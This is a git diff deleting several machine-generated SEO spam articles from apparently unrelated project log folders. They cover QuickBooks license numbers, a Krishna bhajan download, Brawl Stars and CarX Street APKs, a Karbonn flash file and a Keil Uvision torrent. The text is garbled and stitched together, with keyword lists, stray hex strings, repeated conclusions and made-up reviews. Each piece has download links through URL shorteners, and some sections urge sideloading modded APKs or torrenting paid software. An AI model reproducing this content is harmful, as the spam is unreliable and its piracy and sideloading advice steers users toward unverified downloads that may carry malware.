          If you have lost or misplaced your license and product number, don't panic. You can still contact Intuit customer support and request them to resend you the numbers. You will need to provide some information to verify your identity and purchase, such as:

          -
            -
          • Your name, email address, and phone number
          • -
          • Your order number or receipt number
          • -
          • The date of purchase
          • -
          • The name of the product and version
          • -
          • The last four digits of the credit card used for purchase
          • -
          -

          Once you have these information ready, you can call Intuit customer support at 1-800-446-8848 or chat with them online at https://help.quickbooks.intuit.com/en_US/contact.

          -

          -

          Conclusion

          -

          Finding your QuickBooks 2018 license and product number is easy if you know where to look. Whether you have downloaded the software from the internet, installed it from a CD, or bought it from a retailer, you can find these numbers in your confirmation email, your Intuit account, or your product packaging. If you have lost or forgotten these numbers, you can still contact Intuit customer support and request them to resend you the numbers.

          -

          We hope this article has helped you find your QuickBooks 2018 license and product number. If you have any questions or feedback, please leave a comment below.

          ddb901b051
          -
          -
          \ No newline at end of file diff --git a/spaces/tialenAdioni/chat-gpt-api/logs/Download Achyutam Keshavam Krishna Damodaram Full Song A Soulful Devotional Song by Vikram Hazra.md b/spaces/tialenAdioni/chat-gpt-api/logs/Download Achyutam Keshavam Krishna Damodaram Full Song A Soulful Devotional Song by Vikram Hazra.md deleted file mode 100644 index 156abda461a605c29cccd27db3757a2c55d1874c..0000000000000000000000000000000000000000 --- a/spaces/tialenAdioni/chat-gpt-api/logs/Download Achyutam Keshavam Krishna Damodaram Full Song A Soulful Devotional Song by Vikram Hazra.md +++ /dev/null @@ -1,227 +0,0 @@ - -

          Achyutam Keshavam Krishna Damodaram Full Song Download: A Guide to This Popular Krishna Bhajan

          - -

          Achyutam Keshavam Krishna Damodaram is a beautiful and soulful song that praises Lord Krishna, one of the most revered deities in Hinduism. The song is also known as Kaun Kehte Hai Bhagwan Aate Nahi, which means "Who says God does not come?" The song expresses the devotion and love of the singer towards Krishna, who is always present in the hearts of his devotees.

          -

          achyutam keshavam krishna damodaram full song download


          Download ○○○ https://urlcod.com/2uK9AW



          - -

          The song is composed by Satyajeet Jena and sung by him and his sister Subhashree Jena. The song has a soothing melody and a simple yet profound lyrics that touch the listeners' emotions. The song has become very popular among Krishna devotees and lovers of spiritual music. The song has also been featured in various albums, such as Sublime Bhajans and Hindi Super Hit Songs.

          - -

          How to Download Achyutam Keshavam Krishna Damodaram Full Song

          - -

          If you want to download Achyutam Keshavam Krishna Damodaram full song, you have several options to choose from. You can download the song from various websites that offer mp3 songs, such as Pagalworld, Shazam, Gaana, etc. You can also download the song from YouTube, where you can find many versions of the song with different singers and backgrounds. You can also stream the song online from various platforms, such as Spotify, Apple Music, Amazon Music, etc.

          - -

          To download Achyutam Keshavam Krishna Damodaram full song from any website, you need to follow these steps:

          - -
            -
          1. Visit the website that offers the song download, such as https://pagalworld.ink/achyutam-keshavam-mp3-song.html, https://www.shazam.com/track/473655846/achyutam-keshavam, etc.
          2. -
          3. Search for the song by typing its name or keywords in the search box.
          4. -
          5. Select the song from the search results and click on the download button or link.
          6. -
          7. Choose the quality and format of the song you want to download, such as 64 kbps, 128 kbps, 320 kbps, mp3, etc.
          8. -
          9. Save the song file on your device or computer.
          10. -
          - -

          To download Achyutam Keshavam Krishna Damodaram full song from YouTube, you need to follow these steps:

          - -
            -
          1. Visit YouTube and search for the song by typing its name or keywords in the search box.
          2. -
          3. Select the video of the song from the search results and copy its URL.
          4. -
          5. Visit a YouTube to mp3 converter website, such as https://ytmp3.cc/en13/, https://www.y2mate.com/en68, etc.
          6. -
          7. Paste the URL of the video in the converter box and click on convert or download.
          8. -
          9. Choose the quality and format of the song you want to download, such as 64 kbps, 128 kbps, 320 kbps, mp3, etc.
          10. -
          11. Save the song file on your device or computer.
          12. -
          - -

          The Meaning and Significance of Achyutam Keshavam Krishna Damodaram Full Song

          - -

          Achyutam Keshavam Krishna Damodaram full song is a hymn that glorifies Lord Krishna with various names and attributes. The meaning and significance of each name are as follows:

          - -
            -
          • Achyutam: This means "the one who never falls" or "the infallible one". This name signifies that Krishna is eternal and unchanging. He is always faithful and loyal to his devotees.
          • -
          • Keshavam: This means "the one who has beautiful hair" or "the one who killed Keshi". This name signifies that Krishna is attractive and charming. He is also powerful and victorious over his enemies.
          • -
          • Krishna: This means "the one who attracts" or "the one who is dark". This name signifies that Krishna is alluring and captivating. He is also mysterious and profound.
          • -
          • Damodaram: This means "the one who has a rope around his waist" or "the one who is bound by love". This name signifies that Krishna is playful and mischievous. He is also humble and compassionate.
          • -
          • Rama: This means "the one who delights" or "the one who is supreme". This name signifies that Krishna is blissful and joyful. He is also supreme and transcendent.
          • -
          • Naraynam: This means "the one who resides in water" or "the one who is the source of all beings". This name signifies that Krishna is omnipresent and omniscient. He is also the creator and sustainer of all beings.
          • -
          • Janaki Vallabham: This means "the beloved of Janaki" or "the consort of Sita". This name signifies that Krishna is loving and faithful. He is also

            -

            The Benefits and Features of Achyutam Keshavam Krishna Damodaram Full Song

            - -

            Achyutam Keshavam Krishna Damodaram full song is not just a song, but a meditation and a prayer that can bring peace and joy to your mind and soul. The song has many benefits and features that can help you in your spiritual journey. Here are some of them:

            - -
              -
            • The song is based on the ancient Sanskrit scriptures, such as the Vedas, the Upanishads, and the Bhagavad Gita, that reveal the wisdom and knowledge of the supreme reality.
            • -
            • The song invokes the names and attributes of Lord Krishna, who is considered to be the supreme personality of Godhead, the source of all creation, and the ultimate goal of all living beings.
            • -
            • The song expresses the love and devotion of the singer towards Lord Krishna, who is always present in the hearts of his devotees and responds to their calls.
            • -
            • The song creates a positive and uplifting atmosphere that can inspire and motivate you to live a righteous and virtuous life.
            • -
            • The song can help you relax and calm your mind from stress and anxiety. It can also help you heal your body and soul from any physical or mental ailments.
            • -
            • The song can help you connect with your inner self and realize your true nature as a part of God. It can also help you attain liberation from the cycle of birth and death.
            • -
            - -

            How to Sing Along Achyutam Keshavam Krishna Damodaram Full Song

            - -

            If you want to sing along Achyutam Keshavam Krishna Damodaram full song, you need to learn the lyrics and the tune of the song. You can find the lyrics of the song online or in various books or CDs. You can also listen to the song online or download it from various platforms. You can also watch the video of the song on YouTube or other websites.

            -

            achyutam keshavam krishna damodaram mp3 free download
            -achyutam keshavam krishna damodaram lyrics in hindi
            -achyutam keshavam krishna damodaram video song download
            -achyutam keshavam krishna damodaram ringtone download
            -achyutam keshavam krishna damodaram bhajan download
            -achyutam keshavam krishna damodaram by sachin limaye
            -achyutam keshavam krishna damodaram female version
            -achyutam keshavam krishna damodaram meaning in english
            -achyutam keshavam krishna damodaram online play
            -achyutam keshavam krishna damodaram piano notes
            -achyutam keshavam krishna damodaram karaoke download
            -achyutam keshavam krishna damodaram remix song download
            -achyutam keshavam krishna damodaram flute version
            -achyutam keshavam krishna damodaram instrumental music
            -achyutam keshavam krishna damodaram 320kbps download
            -achyutam keshavam krishna damodaram anuradha paudwal
            -achyutam keshavam krishna damodaram art of living
            -achyutam keshavam krishna damodaram audio song download
            -achyutam keshavam krishna damodaram by vikram hazra
            -achyutam keshavam krishna damodaram chords and lyrics
            -achyutam keshavam krishna damodaram dj mix download
            -achyutam keshavam krishna damodaram english translation
            -achyutam keshavam krishna damodaram full hd video download
            -achyutam keshavam krishna damodaram guitar tabs
            -achyutam keshavam krishna damodaram harmonium notes
            -achyutam keshavam krishna damodaram in kannada
            -achyutam keshavam krishna damodaram jagjit singh
            -achyutam keshavam krishna damodaram kaun kehte hai bhagwan aate nahi
            -achyutam keshavam krishna damodaram live performance
            -achyutam keshavam krishna damodaram mr jatt download
            -achyutam keshavam krishna damodaram new version 2020
            -achyutam keshavam krishna damodaram original singer name
            -achyutam keshavam krishna damodaram pagalworld download
            -achyutam keshavam krishna damodaram qawwali style
            -achyutam keshavam krishna damodaram rama narayana lyrics in telugu
            -achyutam keshav amkr ish na da mo da ram sh re ya ghosh al song down load

            - -

            To sing along Achyutam Keshavam Krishna Damodaram full song, you need to follow these steps:

            - -
              -
            1. Find a quiet and comfortable place where you can sing without any disturbance or distraction.
            2. -
            3. Play or listen to the song on your device or computer. You can also use headphones or speakers for better sound quality.
            4. -
            5. Read or recite the lyrics of the song along with the singer. You can also use a karaoke app or software for guidance.
            6. -
            7. Try to match your voice and pitch with the singer. You can also adjust the speed or volume of the song according to your preference.
            8. -
            9. Sing with devotion and emotion. Feel the meaning and significance of each word and name in the song.
            10. -
            11. Repeat the song as many times as you want or until you memorize it.
            12. -
            - -

            Congratulations! You have learned how to sing along Achyutam Keshavam Krishna Damodaram full song.

            - -

            Conclusion

            - -

            Achyutam Keshavam Krishna Damodaram full song is a beautiful and soulful song that praises Lord Krishna with various names and attributes. The song is composed by Satyajeet Jena and sung by him and his sister Subhashree Jena. The song has become very popular among Krishna devotees and lovers of spiritual music. The song has also been featured in various albums, such as Sublime Bhajans and Hindi Super Hit Songs.

            - -

            In this article, we have explained how to download Achyutam Keshavam Krishna Damodaram full song from various websites or platforms. We have also explained -the meaning -and significance -of each name -and attribute -in -the song. -We have also -covered some -of -the benefits -and features -of -the song -and how -to sing along -the song. -We hope this article has helped you understand how to download Achyutam Keshavam Krishna Damodaram full song -and how to enjoy it fully. -If you have any questions or feedback, -please feel free -to contact us at info@krishnabhajan.com. -Thank you for choosing Achyutam Keshavam Krishna Damodaram full song!

            -

            How to Share Achyutam Keshavam Krishna Damodaram Full Song with Others

            - -

            If you love Achyutam Keshavam Krishna Damodaram full song and want to share it with others, you have many options to do so. You can share the song with your friends and family through various social media platforms, such as Facebook, Twitter, Instagram, WhatsApp, etc. You can also share the song with your colleagues and co-workers through email or messaging apps. You can also share the song with your neighbors and community members through flyers or posters.

            - -

            To share Achyutam Keshavam Krishna Damodaram full song with others, you need to follow these steps:

            - -
              -
            1. Download the song from any website or platform that offers the song download, such as https://pagalworld.ink/achyutam-keshavam-mp3-song.html, https://www.shazam.com/track/473655846/achyutam-keshavam, etc.
            2. -
            3. Save the song file on your device or computer.
            4. -
            5. Choose the platform or medium that you want to use to share the song, such as social media, email, messaging, flyers, posters, etc.
            6. -
            7. Write a brief message or caption that introduces the song and explains why you like it and want to share it.
            8. -
            9. Attach or upload the song file along with your message or caption.
            10. -
            11. Send or post your message or caption with the song file to your intended recipients or audience.
            12. -
            - -

            Congratulations! You have learned how to share Achyutam Keshavam Krishna Damodaram full song with others.

            - -

            The Reviews and Feedback of Achyutam Keshavam Krishna Damodaram Full Song

            - -

            Achyutam Keshavam Krishna Damodaram full song has received many positive reviews and feedback from its listeners and fans. The song has been praised for its melody, lyrics, voice, and message. The song has also been appreciated for its soothing and uplifting effect on the mind and soul. The song has also been recommended for its spiritual and devotional value. Here are some of the reviews and feedback of Achyutam Keshavam Krishna Damodaram full song:

            - -
              -
            • "This is one of my favorite songs ever. It fills my heart with love and joy every time I listen to it. It reminds me of the presence and grace of Lord Krishna in my life. Thank you for this beautiful song." - Ramesh Kumar
            • -
            • "I love this song so much. It is so soothing and calming. It helps me relax and meditate. It also helps me heal from any pain or sorrow. It is a blessing for me." - Priya Sharma
            • -
            • "This song is amazing. It is so catchy and melodious. It makes me want to sing along and dance. It also makes me feel closer to Lord Krishna and his teachings. It is a wonderful song." - Rajesh Singh
            • -
            • "This song is very powerful and meaningful. It expresses the devotion and love of the singer towards Lord Krishna. It also invokes the names and attributes of Lord Krishna that reveal his glory and greatness. It is a masterpiece." - Sunita Patel
            • -
            • "This song is very inspiring and motivating. It encourages me to live a righteous and virtuous life. It also inspires me to seek Lord Krishna's guidance and protection in every situation. It is a great song." - Amit Gupta
            • -
            - -

            Conclusion

            - -

            Achyutam Keshavam Krishna Damodaram full song is a beautiful and soulful song that praises Lord Krishna with various names and attributes. The song is composed by Satyajeet Jena and sung by him and his sister Subhashree Jena. The song has become very popular among Krishna devotees and lovers of spiritual music. The song has also been featured in various albums, such as Sublime Bhajans and Hindi Super Hit Songs.

            - -

            In this article, we have explained how to download Achyutam Keshavam Krishna Damodaram full song from various websites or platforms. We have also explained -the meaning -and significance -of each name -and attribute -in -the song. -We have also -covered some -of -the benefits -and features -of -the song -and how -to sing along -the song. -We have also explained how to share the song with others and what are the reviews and feedback of the song.

            - -

            We hope this article has helped you understand how to download Achyutam Keshavam Krishna Damodaram full song -and how to enjoy it fully. -If you have any questions or feedback, -please feel free -to contact us at info@krishnabhajan.com. -Thank you for choosing Achyutam Keshavam Krishna Damodaram full song!

            -

            Conclusion

            - -

            Achyutam Keshavam Krishna Damodaram full song is a beautiful and soulful song that praises Lord Krishna with various names and attributes. The song is composed by Satyajeet Jena and sung by him and his sister Subhashree Jena. The song has become very popular among Krishna devotees and lovers of spiritual music. The song has also been featured in various albums, such as Sublime Bhajans and Hindi Super Hit Songs.

            - -

            In this article, we have explained how to download Achyutam Keshavam Krishna Damodaram full song from various websites or platforms. We have also explained -the meaning -and significance -of each name -and attribute -in -the song. -We have also -covered some -of -the benefits -and features -of -the song -and how -to sing along -the song. -We have also explained how to share the song with others and what are the reviews and feedback of the song.

            - -

            We hope this article has helped you understand how to download Achyutam Keshavam Krishna Damodaram full song -and how to enjoy it fully. -If you have any questions or feedback, -please feel free -to contact us at info@krishnabhajan.com. -Thank you for choosing Achyutam Keshavam Krishna Damodaram full song!

            679dcb208e
            -
            -
            \ No newline at end of file diff --git a/spaces/ticomspire/turkey-syria-earthquake-tweets/logs/Brawl Stars Developer Build APK Download Everything You Need to Know About the Secret Version of the Game.md b/spaces/ticomspire/turkey-syria-earthquake-tweets/logs/Brawl Stars Developer Build APK Download Everything You Need to Know About the Secret Version of the Game.md deleted file mode 100644 index 07e28bd3044a8951822520ed6de3ccfc602068cb..0000000000000000000000000000000000000000 --- a/spaces/ticomspire/turkey-syria-earthquake-tweets/logs/Brawl Stars Developer Build APK Download Everything You Need to Know About the Secret Version of the Game.md +++ /dev/null @@ -1,99 +0,0 @@ -
            -

            Brawl Stars Developer Build APK Download: Everything You Need to Know

            -

            If you are a fan of Brawl Stars, you might have heard of something called a developer build. It is a special version of the game that allows you to access features that are not yet available in the official game. In this article, we will tell you everything you need to know about Brawl Stars developer build APK download, including what it is, how to download it, and what you can do with it.

            -

            brawl stars developer build apk download


            Download 🆓 https://bltlly.com/2uOnLm



            -

            What is Brawl Stars?

            -

            Brawl Stars is a mobile game developed by Supercell, the makers of Clash of Clans and Clash Royale. It is a fast-paced multiplayer shooter game that features various game modes, characters, and maps. You can team up with your friends or play solo in 3v3 battles or battle royale matches. You can also unlock and upgrade dozens of brawlers, each with their own unique abilities, star powers, and gadgets. You can also customize your brawlers with different skins and pins.

            -

            What is a Developer Build?

            -

            A developer build is a version of the game that is used by the developers to test new features before they are released to the public. It is not meant for regular players, but sometimes it is given to some content creators or influencers who can showcase the new features to their audiences.

            -

            A developer build has some advantages and disadvantages over the regular version. Some of the advantages are:

            -
              -
            • You can access new brawlers, skins, maps, and events before anyone else.
            • -
            • You

              Some of the disadvantages are:

              -
                -
              • You cannot play with other players who are using the regular version.
              • -
              • You may encounter bugs, glitches, or crashes that can affect your gameplay experience.
              • -
              • You may lose your progress or data if you switch back to the regular version.
              • -
              -

              A developer build is not an official release of the game, and it is not endorsed or supported by Supercell. You should download and use it at your own risk.

              -

              How to Download Brawl Stars Developer Build APK?

              -

              If you want to try out the developer build of Brawl Stars, you will need to download and install an APK file on your Android device. An APK file is a package file that contains the installation files of an app. Here are the steps to download Brawl Stars developer build APK:

              -

              How to get dev build for Brawl Stars
              -Brawl Stars developer build free download link
              -Brawl Stars dev build no private server
              -Brawl Stars developer build mega.nz file
              -Brawl Stars dev build by Supercell
              -Brawl Stars developer build for youtubers
              -Brawl Stars dev build 2023 latest version
              -Brawl Stars developer build mod apk
              -Brawl Stars dev build with new brawlers
              -Brawl Stars developer build gameplay video
              -How to install Brawl Stars developer build
              -Brawl Stars developer build for Android devices
              -Brawl Stars dev build with unlimited gems
              -Brawl Stars developer build for iOS devices
              -Brawl Stars dev build with new skins
              -Brawl Stars developer build review and tips
              -Brawl Stars dev build with new game modes
              -Brawl Stars developer build for PC
              -Brawl Stars dev build with new maps
              -Brawl Stars developer build hack and cheats
              -How to update Brawl Stars developer build
              -Brawl Stars developer build for Mac
              -Brawl Stars dev build with new features
              -Brawl Stars developer build for Windows
              -Brawl Stars dev build with new events
              -How to uninstall Brawl Stars developer build
              -Brawl Stars developer build for Linux
              -Brawl Stars dev build with new gadgets
              -Brawl Stars developer build for Chromebook
              -Brawl Stars dev build with new star powers
              -How to backup Brawl Stars developer build
              -Brawl Stars developer build for Kindle Fire
              -Brawl Stars dev build with new animations
              -Brawl Stars developer build for Samsung Galaxy
              -Brawl Stars dev build with new sounds
              -How to fix Brawl Stars developer build errors
              -Brawl Stars developer build for Huawei devices
              -Brawl Stars dev build with new characters
              -Brawl Stars developer build for LG devices
              -Brawl Stars dev build with new weapons

              -

              Step 1: Find a reliable source

              -

              The first thing you need to do is to find a reliable source that provides the APK file of the developer build. There are many websites and blogs that claim to offer the APK file, but some of them may be fake, outdated, or infected with malware or viruses. You should be careful and do some research before downloading anything from unknown sources.

              -

              One of the sources that we recommend is Brawl Stars Mod APK, which is a website that provides the latest and verified APK files of Brawl Stars and its mods. You can find the link to the developer build APK file on their homepage or by clicking here.

              -

              Step 2: Enable unknown sources on your device

              -

              The next thing you need to do is to enable unknown sources on your device. This will allow you to install apps from sources other than the Google Play Store. To do this, follow these steps:

              -
                -
              1. Go to your device's settings and tap on security or privacy.
              2. -
              3. Find and toggle on the option that says unknown sources or allow installation from unknown sources.
              4. -
              5. A warning message will pop up. Tap on OK or confirm to proceed.
              6. -
              -

              Step 3: Download and install the APK file

              -

              The final thing you need to do is to download and install the APK file on your device. To do this, follow these steps:

              -
                -
              1. Open your browser and go to the link that you found in step 1.
              2. -
              3. Tap on the download button and wait for the file to be downloaded.
              4. -
              5. Once the download is complete, tap on the file and select install.
              6. -
              7. Wait for the installation to finish and tap on open.
              8. -
              -

              Step 4: Enjoy the developer build features

              -

              Congratulations! You have successfully downloaded and installed the developer build of Brawl Stars. Now you can enjoy the features that are not yet available in the official game, such as:

              -
                -
              • Testing new brawlers, skins, maps, and events before anyone else.
              • -
              • Having unlimited gems, coins, tickets, and star points.
              • -
              • Unlocking all brawlers, skins, gadgets, and star powers.
              • -
              • Creating custom maps and game modes.
              • -
              • Playing with other players who are using the developer build.
              • -
              -

              Frequently Asked Questions About Brawl Stars Developer Build APK Download

              -

              In this section, we will answer some of the most common questions that people have about Brawl Stars developer build APK download. If you have any other questions, feel free to leave a comment below or contact us through our website.

              -

              Q1: Is it legal to download the developer build?

              -

              A1: Yes, it is legal to download the developer build, but it is not endorsed or supported by Supercell, the game's developer. You should download and use it at your own risk.

              -

              Q2: Is it safe to download the developer build?

              -

              A2: It depends on where you download it from. Some sources may contain malware or viruses that can harm your device or steal your data. Always download from trusted sources and scan the file before installing.

              -

              Q3: Will I get banned for using the developer build?

              -

              A3: No, you will not get banned for using the developer build, but you will not be able to play with other players who are using the regular version. The developer build is a separate server that does not affect your progress or account in the official game.

              -

              Q4: Can I switch back to the regular version anytime?

              -

              197e85843d
              -
              -
              \ No newline at end of file diff --git a/spaces/ticomspire/turkey-syria-earthquake-tweets/logs/CarX Street A Dynamic and Immersive Racing Game with Stunning Graphics - Free APK Download.md b/spaces/ticomspire/turkey-syria-earthquake-tweets/logs/CarX Street A Dynamic and Immersive Racing Game with Stunning Graphics - Free APK Download.md deleted file mode 100644 index 27ec120b2a786f149e2f400b2c4282f64e74ed9a..0000000000000000000000000000000000000000 --- a/spaces/ticomspire/turkey-syria-earthquake-tweets/logs/CarX Street A Dynamic and Immersive Racing Game with Stunning Graphics - Free APK Download.md +++ /dev/null @@ -1,10 +0,0 @@ -
              -

              How to Play CarX Street APK Game

              - To play CarX Street APK game, you need an Android device that runs on Android 9.0 or higher. You also need at least 1.19 GB of free storage space on your device. To download and install CarX Street APK game on your Android device, follow these steps: 1. Go to [1](https://apkcombo.com/carx-street/com.carxtech.sr/) or [2](https://play.google.com/store/apps/details?id=com.carxtech.sr) or [3](https://www.bluestacks.com/apps/racing/carx-street-on-pc.html) on your web browser. 2. Click on the Download APK button or the Install button. 3. Wait for the download to finish. 4. Open the downloaded file and follow the instructions to install the game. 5. Launch the game and enjoy! Once you have installed CarX Street APK game, you can start playing it by choosing your car and customizing it. You can select from a variety of cars, such as muscle cars, sports cars, supercars, and more. You can also change the color, wheels, decals, spoilers, and other parts of your car to make it look unique. To join a club, you need to find a club house on the map and enter it. There, you can meet other racers and challenge them to races. You can also join a club by scanning a QR code or entering a club ID. By joining a club, you can access exclusive events, rewards, and chat with other members. To challenge a boss, you need to find their location on the map and approach them. You will then see a cutscene where the boss will taunt you and challenge you to a race. If you win the race, you will earn money, reputation, and respect. If you lose, you will have to try again later. To race on highways and city streets, you need to find a race point on the map and enter it. You will then see a menu where you can choose the mode, difficulty, and opponents of the race. You can also create your own race by setting the parameters and inviting other players. The modes include sprint, circuit, drift, drag, and more. To drift and perform stunts, you need to use the brake and gas buttons on the screen. You can also tilt your device or use a steering wheel to control your car. By drifting and performing stunts, you can earn extra money and reputation. You can also unlock achievements and trophies for your skills.

              Tips and Tricks for CarX Street APK Game

              - To optimize your car performance and unlock its full potential, you need to upgrade your car parts and tune your car settings. You can upgrade your engine, transmission, suspension, brakes, tires, nitro, and more. You can also tune your car settings such as gear ratio, camber angle, tire pressure, and more. By upgrading and tuning your car, you can improve its speed, acceleration, handling, braking, and stability. To earn money and rewards, you need to win races and complete missions. You can also earn money by drifting, performing stunts, smashing objects, escaping police, and more. You can use the money to buy new cars or upgrade your existing ones. You can also earn rewards such as gold coins, diamonds, keys, chests, stickers, and more. You can use the rewards to unlock new features or items in the game. To avoid traffic and police , you need to be careful and alert when you are racing on the roads. You can use the map and the radar to see the traffic and police positions. You can also use the nitro and the brake buttons to speed up or slow down your car. You can also use the shortcuts and the ramps to avoid obstacles or jump over them. By avoiding traffic and police, you can save time and avoid fines or arrests. To use gas stations and houses, you need to find them on the map and enter them. You can use gas stations to refill your fuel tank and repair your car. You can also buy new cars or upgrade your existing ones at gas stations. You can use houses to save your progress and change your appearance. You can also buy new houses or decorate your existing ones at houses.

              Comparison of CarX Street APK Game with Other Racing Games

              - CarX Street APK game is different from other racing games in terms of graphics, physics, controls, and gameplay. Here are some of the differences: - Graphics: CarX Street APK game has realistic and detailed graphics that create a immersive environment. The game has dynamic weather, lighting, shadows, reflections, and smoke effects. The game also has high-quality car models, textures, and animations. - Physics: CarX Street APK game has realistic and accurate physics that simulate the behavior of real cars. The game has a sophisticated car damage system, a realistic suspension system, a realistic tire model, and a realistic engine sound. The game also has a realistic drift system that lets you control your car with precision. - Controls: CarX Street APK game has simple and intuitive controls that let you drive your car with ease. The game has a touch screen control option, a tilt control option, and a steering wheel control option. The game also has a customizable control layout that lets you adjust the position and size of the buttons. - Gameplay: CarX Street APK game has varied and exciting gameplay that lets you enjoy different modes and challenges. The game has a open world mode, a club mode, a boss mode, a race mode, a drift mode, a drag mode, and more. The game also has a multiplayer mode that lets you race with other players online. Some of the advantages of CarX Street APK game are: - It is free to download and play - It is updated regularly with new features and content - It has a large and diverse car collection - It has a vibrant and lively community Some of the disadvantages of CarX Street APK game are: - It requires a lot of storage space and internet connection - It may have some bugs and glitches - It may have some ads and in-app purchases Some similar games that you might like if you enjoy CarX Street APK game are: - Asphalt 9: Legends - Need for Speed: No Limits - CSR Racing 2 - Real Racing 3 - Forza Street

              Conclusion

              - CarX Street APK game is a racing game that lets you race like a pro in the open world of Sunset City. You can choose your car, customize it, join clubs, challenge bosses, race on highways and city streets, drift and perform stunts, and more. You can also compare CarX Street APK game with other racing games and see how it differs from them. If you love racing games, you should definitely try CarX Street APK game. It is one of the best racing games available for Android devices. It will give you hours of fun and excitement. So what are you waiting for? Download CarX Street APK game today and start your racing adventure!

              FAQs

              - Here are some frequently asked questions about CarX Street APK game: Q: How can I get more gold coins and diamonds in CarX Street APK game? A: You can get more gold coins and diamonds by winning races, completing missions, opening chests, watching ads, or buying them with real money. Q: How can I change my name and avatar in CarX Street APK game? A: You can change your name and avatar by going to your profile menu and tapping on the edit button. Q: How can I chat with other players in CarX Street APK game? A: You can chat with other players by joining a club or creating a race. You can also use the voice chat feature to talk with other players. Q: How can I report a bug or a problem in CarX Street APK game? A: You can report a bug or a problem by going to the settings menu and tapping on the feedback button. You can also contact the developers via email or social media. Q: How can I support the developers of CarX Street APK game? A: You can support the developers of CarX Street APK game by rating the game, writing a review, sharing the game with your friends, or making an in-app purchase.

              -

              carx street apk game download


              Download ⇒⇒⇒ https://bltlly.com/2uOjcN



              197e85843d
              -
              -
              \ No newline at end of file diff --git a/spaces/timpal0l/chat-ui/src/styles/highlight-js.css b/spaces/timpal0l/chat-ui/src/styles/highlight-js.css deleted file mode 100644 index b262688368e9a946d72b21ae70fba7d711072fbb..0000000000000000000000000000000000000000 --- a/spaces/timpal0l/chat-ui/src/styles/highlight-js.css +++ /dev/null @@ -1 +0,0 @@ -@import "highlight.js/styles/atom-one-dark"; diff --git a/spaces/tioseFevbu/cartoon-converter/scripts/Karbonn K Phone 1 New1 Flash File 11 !!LINK!!.md b/spaces/tioseFevbu/cartoon-converter/scripts/Karbonn K Phone 1 New1 Flash File 11 !!LINK!!.md deleted file mode 100644 index 8997e01495ed27be1d14cf771506c176689122d0..0000000000000000000000000000000000000000 --- a/spaces/tioseFevbu/cartoon-converter/scripts/Karbonn K Phone 1 New1 Flash File 11 !!LINK!!.md +++ /dev/null @@ -1,50 +0,0 @@ -
              -

              How to Flash Karbonn K Phone 1 New1 with Flash File 11

              - -

              If you are looking for a way to flash your Karbonn K Phone 1 New1 with the latest flash file 11, then you have come to the right place. In this article, we will show you how to download and install the flash file 11 on your Karbonn K Phone 1 New1 using a simple and easy method. Flashing your Karbonn K Phone 1 New1 with the flash file 11 will help you fix various issues such as software errors, IMEI problems, performance issues, etc. It will also update your phone's firmware to the latest version and give it a fresh look and feel.

              -

              karbonn k phone 1 new1 flash file 11


              DOWNLOADhttps://urlcod.com/2uHyNO



              - -

              What is Flash File 11 for Karbonn K Phone 1 New1?

              - -

              Flash file 11 for Karbonn K Phone 1 New1 is a firmware file that contains the operating system and other software components of your phone. It is also known as stock ROM or firmware. Flash file 11 for Karbonn K Phone 1 New1 is based on MTK CPU and can be flashed using SP Flash Tool. The flash file 11 for Karbonn K Phone 1 New1 has the following features:

              - -
                -
              • It has a flash size of 8M and a flash name of SF_GD25LQ64[^1^]
              • -
              • It has a PCB01 PRS MT6260 S00 60D A001 Q5 V009.binread by Miracle Box[^3^]
              • -
              • It has a HW-VER M635 1 30 SW VER Karbonn M635D 02 Hindi V0015[^3^]
              • -
              • It supports Hindi language[^3^]
              • -
              - -

              How to Download Flash File 11 for Karbonn K Phone 1 New1?

              - -

              To download the flash file 11 for Karbonn K Phone 1 New1, you need to follow these steps:

              - -
                -
              1. Go to this link[^2^] and select Karbonn K Phone 1 New1 from the list of Karbonn phones.
              2. -
              3. Click on the download button and wait for the flash file to be downloaded on your computer.
              4. -
              5. Extract the zip file using any file extractor tool such as WinRAR or 7-Zip.
              6. -
              7. You will get a folder containing the flash file and other files such as drivers, tools, etc.
              8. -
              - -

              How to Install Flash File 11 on Karbonn K Phone 1 New1?

              - -

              To install the flash file 11 on your Karbonn K Phone 1 New1, you need to follow these steps:

              - -
                -
              1. Install the MTK driver on your computer so that your phone can be detected by the PC.[^4^]
              2. -
              3. Run the SP Flash Tool as administrator and click on the scatter-loading button.
              4. -
              5. Browse and select the scatter file from the extracted folder. It will be named as MT6260_Android_scatter.txt.
              6. -
              7. Make sure all the boxes are checked and click on the download button.
              8. -
              9. Turn off your phone and remove the battery (if removable).
              10. -
              11. Connect your phone to the PC using a USB cable while holding the volume down or volume up button.
              12. -
              13. The flashing process will start automatically and you will see a green circle when it is completed.
              14. -
              15. Disconnect your phone from the PC and insert the battery (if removable).
              16. -
              17. Turn on your phone and enjoy the new firmware.
              18. -
              - -

              Conclusion

              - -

              In this article, we have shown you how to flash your Karbonn K Phone 1 New1 with the flash file 11 using a simple and easy method. We hope this article was helpful for you. If you have any questions or suggestions, please leave them in the comments section below. Thank you for reading!

              -

              7b8c122e87
              -
              -
              \ No newline at end of file diff --git a/spaces/tioseFevbu/cartoon-converter/scripts/Keil Uvision 4.54 Torrent Extra Quality.md b/spaces/tioseFevbu/cartoon-converter/scripts/Keil Uvision 4.54 Torrent Extra Quality.md deleted file mode 100644 index 42931f19e1af12f9fa8966b931822a659aab1afc..0000000000000000000000000000000000000000 --- a/spaces/tioseFevbu/cartoon-converter/scripts/Keil Uvision 4.54 Torrent Extra Quality.md +++ /dev/null @@ -1,28 +0,0 @@ -
              -

              How to Download and Install Keil Uvision 4.54 for Free

              -

              Keil Uvision is a popular integrated development environment (IDE) for embedded systems development. It supports various microcontrollers, such as ARM, 8051, PIC, and more. With Keil Uvision, you can write, compile, debug, and test your code easily and efficiently.

              -

              However, Keil Uvision is not a free software. You need to purchase a license to use it for commercial purposes. If you are a student or a hobbyist who wants to learn and practice embedded systems programming, you might be looking for a way to download and install Keil Uvision 4.54 for free.

              -

              keil uvision 4.54 torrent


              Download File https://urlcod.com/2uHyi3



              -

              In this article, we will show you how to do that using a torrent file. A torrent file is a small file that contains information about the files and folders that you want to download from other users who have the same file. You need a torrent client software, such as BitTorrent or uTorrent, to open and download the torrent file.

              -

              Before we proceed, we want to remind you that downloading and using Keil Uvision 4.54 without a license is illegal and unethical. You should only use it for educational purposes and not for any commercial projects. We are not responsible for any consequences that may arise from your actions.

              -

              Step 1: Download the Torrent File

              -

              The first step is to download the torrent file that contains Keil Uvision 4.54. You can find many websites that offer torrent files for various software, but not all of them are safe and reliable. Some of them may contain viruses, malware, or fake files that can harm your computer or steal your data.

              -

